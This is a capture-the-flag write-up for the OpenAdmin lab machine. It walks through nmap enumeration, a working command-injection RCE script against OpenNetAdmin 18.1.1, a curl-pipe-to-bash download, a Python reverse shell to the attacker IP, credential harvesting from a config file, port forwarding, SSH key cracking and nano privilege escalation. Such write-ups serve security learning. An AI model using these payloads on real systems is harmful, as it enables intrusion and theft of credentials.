Link of the box: OpenAdmin
Enumeration (NMAP)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
nmap -p- -vvv -n --min-rate 5000 -T5 10.10.10.171 -oN ports
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-18 22:20 EST
Initiating Ping Scan at 22:20
Scanning 10.10.10.171 [2 ports]
Completed Ping Scan at 22:20, 0.16s elapsed (1 total hosts)
Initiating Connect Scan at 22:20
Scanning 10.10.10.171 [65535 ports]
Discovered open port 22/tcp on 10.10.10.171
Discovered open port 80/tcp on 10.10.10.171
Increasing send delay for 10.10.10.171 from 0 to 5 due to 41 out of 102 dropped probes since last increase.
Warning: 10.10.10.171 giving up on port because retransmission cap hit (2).
Completed Connect Scan at 22:20, 31.81s elapsed (65535 total ports)
Nmap scan report for 10.10.10.171
Host is up, received syn-ack (0.16s latency).
Scanned at 2021-11-18 22:20:14 EST for 32s
Not shown: 33951 filtered ports, 31582 closed ports
Reason: 33951 no-responses and 31582 conn-refused
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 32.03 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
nmap -p22,80 -sC -sV 10.10.10.171 -oN scan
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-18 22:21 EST
Nmap scan report for 10.10.10.171
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.90 seconds
Exploitation
After the dirsearch I found the version for a system call OpenNetAdmin with the version 18.1.1. Looking into searchsploit we found an RCE exploit or you can just copy the sh code bellow:
1
2
3
4
5
6
7
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "http://10.10.10.171/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
That a look at the URL.
After some tries, this got me the shell, the box is using python3.
1
2
3
4
5
curl 10.10.14.31:8000/emanlui.py | bash
nc -lvnp 4444
python3 -m http.server
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.31",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
Inside the local/config folder there’s a datbase config file where we can find the jimmy password for the ssh
n1nj4W4rri0R!
There’s an internal folder that is only accessible to Jimmy. if we curl the we can get the ssh key to joana session. It is not needed in this case to port forward anything because we can get the flag, but if not, we can just crack the sha hash found in the index and the login into jimmy account to get the ssh key
./chisel client 10.10.14.31:1234 R:127.0.0.1:52846:127.0.0.1:52846 ./chisel server –reverse -p 1234
OR
You can do the following steps:
1
2
Enter + ~ + C to enter into SSH mode
ssh> -L 52846:127.0.0.1:52846
It uses the current session to port forward the traffic 
Getting the ssh key:
We need to crack the ssh key
https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/ssh2john.py
And we got the password
joanna:bloodninjas
Now we have sudo access to nano, following the steps in the link we can find the flag.
https://gtfobins.github.io/gtfobins/nano/